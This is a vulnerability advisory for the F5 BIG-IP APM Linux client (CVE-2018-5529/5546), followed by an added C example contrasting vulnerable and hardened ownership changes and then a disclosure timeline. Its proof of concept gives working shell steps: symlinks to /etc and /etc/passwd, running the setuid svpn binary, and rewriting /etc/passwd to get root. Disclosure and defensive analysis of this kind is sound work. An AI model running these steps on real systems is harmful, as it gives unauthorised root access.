Title: F5 BIG-IP APM client for Linux and macOS vulnerability
Author: Rich Mirch
CVE: CVE-2018-5529 (incomplete fix), CVE-2018-5546
Vendor Advisory: https://support.f5.com/csp/article/K52171282 (CVE-2018-5529)
                 https://support.f5.com/csp/article/K54431371 (CVE-2018-5546)

Description

The svpn_x86_64 binary included in the F5 Linux CLI Edge Client package
changes the ownership and permissions of several files and directories
under $HOME/.F5Networks, which allows local unprivileged users to obtain
ownership of arbitrary files via vectors involving creation of a directory
and a file under that directory, and later replacing that directory or
file with a symlink.

Notes:
1. A PoC is provided for Linux; however, macOS is also vulnerable. The svpn binary
   is named differently and stored in a different directory on macOS.
2. The policyserver component is also vulnerable to a similar attack against
   the $HOME/Library/Logs/F5Networks/policyserver.log file on macOS.

CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C
Base: 7.8
Temporal: 7.0

Test Environment
OS: CentOS 64-bit release 6.9 (latest patches as of 2018-04-12)
Kernel: 2.6.32-696.23.1.el6.x86_64
ISO: apmclients-7160.2018.118.2335-4172.0.iso

Proof Of Concept

Two distinct arbitrary file takeover vulnerabilities exist in the
/usr/local/lib/F5Networks/SSLVPN/svpn_x86_64 binary, which is setuid root.
1. Privileges are not dropped prior to chown()/chmod() of the
   $HOME/.F5Networks directory.
2. Privileges are not dropped prior to chown()/chmod() of the
   $HOME/.F5Networks/svpn.log file.

Note: A low privileged account named user1 is used for all test cases.

[user1@localhost ~]$ id
uid=500(user1) gid=500(user1) groups=500(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
################################################################################
# Test case 1 - take ownership of a directory
# /etc via $HOME/.F5Networks
################################################################################

[Step 1] Create a symlink from /etc to $HOME/.F5Networks

[user1@localhost ~]$ ln -s /etc /home/user1/.F5Networks
[user1@localhost ~]$ ls -ld /etc /home/user1/.F5Networks
drwxr-xr-x. 64 root root 4096 Apr 12 19:29 /etc
lrwxrwxrwx. 1 user1 user1 4 Apr 12 19:38 /home/user1/.F5Networks -> /etc

[Step 2] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64

[user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64

[Step 3] Show that user1 is now the owner of /etc.

[user1@localhost ~]$ ls -ld /etc
drwxr-xr-x. 64 user1 user1 4096 Apr 12 19:39 /etc

[Step 4] Modify /etc/passwd and change UID/GID to 0 for user1.

[user1@localhost ~]$ cd /etc
[user1@localhost etc]$ mv passwd passwd.old
[user1@localhost etc]$ cp passwd.old passwd
[user1@localhost etc]$ ls -ld /etc/passwd
-rw-r--r--. 1 user1 user1 929 Apr 12 19:40 /etc/passwd
[user1@localhost etc]$ sed -i.orig -e 's/:500:500/:0:0/' /etc/passwd
[user1@localhost etc]$ diff -u /etc/passwd.orig /etc/passwd
--- /etc/passwd.orig 2018-04-12 19:40:02.132987696 -0500
+++ /etc/passwd 2018-04-12 19:41:15.484988778 -0500
@@ -18,4 +18,4 @@
 postfix:x:89:89::/var/spool/postfix:/sbin/nologin
 sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
 ntp:x:38:38::/etc/ntp:/sbin/nologin
-user1:x:500:500::/home/user1:/bin/bash
+user1:x:0:0::/home/user1:/bin/bash

[Step 5] Execute /bin/su - user1 and become root.

[user1@localhost etc]$ /bin/su - user1
Password:
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
################################################################################
# Test case 2 - take ownership of a file
# /etc/passwd via $HOME/.F5Networks/svpn.log
################################################################################

[Step 1] Create $HOME/.F5Networks.

[user1@localhost ~]$ mkdir -m 755 /home/user1/.F5Networks

[Step 2] Display permissions of /etc/passwd and attempt to write to it.

[user1@localhost ~]$ ls -ld /etc /etc/passwd
drwxr-xr-x. 64 root root 4096 Apr 12 19:41 /etc
-rw-r--r--. 1 root root 929 Apr 12 19:40 /etc/passwd
[user1@localhost ~]$ echo test> /etc/passwd
-bash: /etc/passwd: Permission denied
[user1@localhost ~]$

[Step 3] Create a symlink from /etc/passwd to /home/user1/.F5Networks/svpn.log.

[user1@localhost ~]$ ln -s /etc/passwd /home/user1/.F5Networks/svpn.log
[user1@localhost ~]$ ls -ld .F5Networks/svpn.log /etc/passwd
-rw-r--r--. 1 root root 929 Apr 12 19:40 /etc/passwd
lrwxrwxrwx. 1 user1 user1 11 Apr 12 22:02 .F5Networks/svpn.log -> /etc/passwd

[Step 4] Back up /etc/passwd.

[user1@localhost ~]$ cp -p /etc/passwd passwd.orig

[Step 5] Display contents of /etc/passwd.

[user1@localhost ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
user1:x:500:500::/home/user1:/bin/bash

[Step 6] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64. user1 is
now the owner of /etc/passwd.

[user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[user1@localhost ~]$ ls -ld /etc/passwd
-rw-r--r--. 1 user1 user1 2385 Apr 12 22:14 /etc/passwd

[Step 7] Display contents of /etc/passwd. Notice that the log output has been appended to the file.

[user1@localhost ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
user1:x:500:500::/home/user1:/bin/bash
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, =====================================
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Location: /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Version: "7160.2018.0118.1"
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Locale: C
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, =====================================
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,
2018-04-12,22:14:15:121, 2479,2479,svpn, 48,,,, current log level = 63
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 91, ------------------,
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 92, [main], getuid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 93, [main], getgid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 94, [main], geteuid, 0
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 95, [main], getegid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 96, [main], HOME, /home/user1
2018-04-12,22:14:15:121, 2479,2479,svpn, 48, , 98, [main], version, 7160.2018.0118.1
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 100, ------------------,
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 107, [main], Current sigprocmask: 0xffff8a00
2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 33, ReadProperties(), reading of initial configuration timed out
2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 116, [main], Reading settings property failed

[Step 8] Create a new /etc/passwd file and change UID and GID to 0.

[user1@localhost ~]$ sed -e 's/:500:500/:0:0/' < passwd.orig > /etc/passwd

[Step 9] Execute /bin/su - user1 and become root.

[user1@localhost ~]$ su - user1
Password:
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost ~]#
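Both test cases come down to the same defect: the setuid helper calls chown()/chmod() by path, with effective uid 0, on a location the user controls, and both syscalls follow symlinks. The C program below is an added example, not code from the advisory or from F5; it places that vulnerable pattern beside the hardened form a helper should use (open the component with O_NOFOLLOW, fstat the descriptor actually opened, act only on that descriptor, and do the per-user work with the effective uid dropped to the invoking user). It assumes Linux/POSIX; the function names, the result codes and the throwaway fixture it builds under /tmp are this example's own and are constructed for the demonstration.

```c
/* Added example, not code from the advisory or from F5: how a setuid helper
 * should adjust ownership of per-user files such as $HOME/.F5Networks/svpn.log
 * without the symlink problem the PoC exploits.  Linux/POSIX assumed; the
 * function names and result codes are this example's own. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

enum fix_result {
    FIX_OK = 0,
    FIX_SYMLINK = -1,       /* final path component is a symlink: refused */
    FIX_WRONG_TYPE = -2,    /* not the regular file / directory expected */
    FIX_FOREIGN_OWNER = -3, /* owned by a third user: do not hand it over */
    FIX_ERROR = -4          /* other failure, errno is set */
};

/* The vulnerable pattern from the advisory: chown()/chmod() by path with euid 0.
 * Both calls follow symlinks, so $HOME/.F5Networks -> /etc redirects them. */
int unsafe_fix_owner(const char *path, uid_t uid, gid_t gid, mode_t mode)
{
    return chown(path, uid, gid) == 0 && chmod(path, mode) == 0 ? FIX_OK : FIX_ERROR;
}

/* Hardened replacement: open one component under a validated directory fd,
 * inspect the inode actually opened, then act on that descriptor only. */
int safe_fix_owner_at(int dirfd, const char *name, uid_t uid, gid_t gid,
                      mode_t mode, int want_dir)
{
    struct stat st;
    int rc = FIX_ERROR;
    /* O_NOFOLLOW: a symlink fails with ELOOP; O_NONBLOCK: a planted FIFO cannot hang us. */
    int fd = openat(dirfd, name, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);
    if (fd < 0)
        return errno == ELOOP ? FIX_SYMLINK : FIX_ERROR;
    if (fstat(fd, &st) == 0) {
        if (want_dir ? !S_ISDIR(st.st_mode) : !S_ISREG(st.st_mode))
            rc = FIX_WRONG_TYPE;
        else if (st.st_uid != uid && st.st_uid != 0)
            rc = FIX_FOREIGN_OWNER;
        else if ((st.st_uid != uid || st.st_gid != gid) && fchown(fd, uid, gid) != 0)
            rc = FIX_ERROR;
        else
            rc = fchmod(fd, mode) == 0 ? FIX_OK : FIX_ERROR;
    }
    close(fd);
    return rc;
}

/* Fix $HOME/.F5Networks and then svpn.log relative to it, with the effective
 * uid dropped to the invoking user for the duration (the step the advisory
 * says is missing).  With that, even a wrong check above cannot chown a
 * root-owned file: the kernel refuses with EPERM and we report FIX_ERROR. */
int fix_user_log_dir(const char *home, uid_t uid, gid_t gid)
{
    uid_t saved = geteuid();
    int rc = FIX_ERROR, homefd, dfd;
    if (seteuid(getuid()) != 0)
        return FIX_ERROR;
    if ((homefd = open(home, O_RDONLY | O_DIRECTORY | O_CLOEXEC)) >= 0) {
        rc = safe_fix_owner_at(homefd, ".F5Networks", uid, gid, 0755, 1);
        if (rc == FIX_OK) {
            rc = FIX_ERROR;
            dfd = openat(homefd, ".F5Networks", O_RDONLY | O_NOFOLLOW | O_DIRECTORY | O_CLOEXEC);
            if (dfd >= 0) { rc = safe_fix_owner_at(dfd, "svpn.log", uid, gid, 0644, 0); close(dfd); }
        }
        close(homefd);
    }
    seteuid(saved);   /* regain privilege for whatever privileged work remains */
    return rc;
}

/* Constructed fixture: a throwaway HOME with a real svpn.log plus a planted
 * symlink, mirroring test case 2 of the advisory without touching /etc. */
struct demo_results { int regular, symlink, wrong_type, whole_tree; };

struct demo_results run_demo(void)
{
    struct demo_results r = { FIX_ERROR, FIX_ERROR, FIX_ERROR, FIX_ERROR };
    char home[] = "/tmp/f5demo.XXXXXX", dir[160], file[192], link[192];
    if (!mkdtemp(home))
        return r;
    snprintf(dir, sizeof dir, "%s/.F5Networks", home);
    snprintf(file, sizeof file, "%s/svpn.log", dir);
    snprintf(link, sizeof link, "%s/planted.log", dir);
    mkdir(dir, 0700);
    close(open(file, O_WRONLY | O_CREAT | O_EXCL, 0600));
    symlink("../victim.txt", link);          /* the link an attacker would plant */
    int dfd = open(dir, O_RDONLY | O_DIRECTORY);
    if (dfd >= 0) {
        r.regular = safe_fix_owner_at(dfd, "svpn.log", getuid(), getgid(), 0644, 0);
        r.symlink = safe_fix_owner_at(dfd, "planted.log", getuid(), getgid(), 0644, 0);
        r.wrong_type = safe_fix_owner_at(dfd, "svpn.log", getuid(), getgid(), 0755, 1);
        close(dfd);
    }
    r.whole_tree = fix_user_log_dir(home, getuid(), getgid());
    unlink(link); unlink(file); rmdir(dir); rmdir(home);
    return r;
}
```

Running run_demo() as an ordinary user shows the two layers: the planted symlink is refused by the O_NOFOLLOW open (FIX_SYMLINK) before any chown can happen, a file of the wrong type is refused after fstat (FIX_WRONG_TYPE), and the real svpn.log under a real .F5Networks directory is fixed up normally (FIX_OK). Note that the privilege drop means a root-owned leftover under $HOME cannot be re-owned by this path; that is the intended safe failure, since a helper that must hand root-owned files to users is exactly what the advisory exploits.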
Timeline:
2018-04-16: Reported to vendor
2018-04-18: Vendor confirmed PoC. Sent to F5 PD for further review
2018-04-25: Vendor confirmed vulnerability and requested embargo
2018-07-12: Vendor released fix in 7.1.7 and advisory K52171282. CVE-2018-5529
2018-07-17: Notified vendor that the fix in 7.1.7 did not properly resolve the issue
2018-07-17: Vendor acknowledged receipt of the incomplete fix report
2018-07-17: Vendor confirmed vulnerability
2018-08-16: Vendor released fix in 7.1.7.1 and advisory K54431371. CVE-2018-5546